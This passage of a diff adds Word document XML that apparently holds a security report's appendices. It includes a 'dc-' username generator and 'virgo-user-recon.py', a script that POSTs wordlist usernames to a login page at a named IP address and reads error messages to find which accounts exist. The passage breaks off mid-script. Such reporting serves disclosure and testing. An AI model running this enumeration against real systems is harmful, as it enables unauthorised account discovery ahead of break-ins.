+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>xs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>itertools.product</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>chrs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>, repeat=n):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        print('dc-' + ''.join(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>xs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>) + '1')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        print('dc-' + ''.join(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>xs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>) + '2')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc64661826"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Appendix </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>: virgo-user-recon.py</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="1"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>import requests</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>import urllib3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>import time</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t># Omitting the warnings for cleaner output</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>urllib3.disable_warnings()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># The target </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 'https://129.234.196.27/usage/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>login.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># The wordlist with all usernames </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>f = open('test_users.txt', 'r')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lines = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>f.read</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>().</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>splitlines</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># For each line in the user wordlist, send it as a username and then judge the response. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>for line in lines:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">  # Payload which goes into POST request against login system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        values = {'username': line, 'password': 'pass'}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        r = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>requests.post</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>, data=values, verify=False)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>time.sleep</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>(1)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">  # Not found omitted to prevent too much output</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        #</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>b"Failed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to locate username:" in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>r.content</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        #</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("{}: Not </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>found".format</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>(values["username"]))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">  # If this text shows up, the username is a part of COSMA</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">        if </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>b"Failed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
